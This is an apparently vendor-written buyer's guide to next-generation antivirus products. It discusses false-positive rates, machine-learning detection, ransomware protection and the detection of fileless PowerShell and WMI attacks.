Modern attacks take multiple shapes and require advanced defense strategies. While legacy antivirus solutions are still needed to block the tens of thousands of malware and ransomware strains that are out there, there is a critical need to move beyond traditional antivirus.
A new breed of software called next-generation antivirus (NGAV) was developed to meet that need. All of them use a variety of new technologies, including machine learning and artificial intelligence (AI) to identify and block malicious activities based on their behavior.Here are five important points to consider when looking into a NGAV product:
Traditional antivirus software tends to have a relatively low rate of false positives because it was built to identify malware that was previously defined as malicious based on indicators of compromise such as hashes, signatures, IPs, domains and URLs.
In contrast, NGAV software attempts to identify never-before-seen malware and protect against it. This is a harder, less definitive task that tends to generate a high volume of false positives.
When testing NGAV, go beyond the malware provided by the NGAV vendor and check the configuration to assess the product's real-life false positive rate.
While a certain amount of false alerts is manageable, many times it causes alert fatigue and makes security teams shut down noisy detection mechanisms, which may lead to them missing critical alerts.
An effective NGAV employs advanced machine learning, data analysis and AI to identify new attack methodologies, define them as malicious and protect against them. When possible, it is highly recommended to test the abilities of the considered tool against a set of advanced threats.
Ransomware has a different set of behaviors compared to other types of malware. Chiefly, they quickly encrypt much data as possible and make their presence known. It is critical for an NGAV solution to use effective mechanisms to protect against new ransomware strains, including ones that encrypt the Master Boot Record, such as NotPetya.
We estimate that about half of today's attacks use techniques that are malware-free or fileless malware. These attacks use scripting languages native to Windows, such as WMI and PowerShell, to perform malicious activities. Since WMI and PowerShell are heavily used by IT admins during their daily duties, avoid any NGAV solutions that take blacklisting/whitelisting approach. Whitelisting PowerShell activity is a very time-consuming process. Instead, a NGAV product should look at the script and able to determine if it is malicious.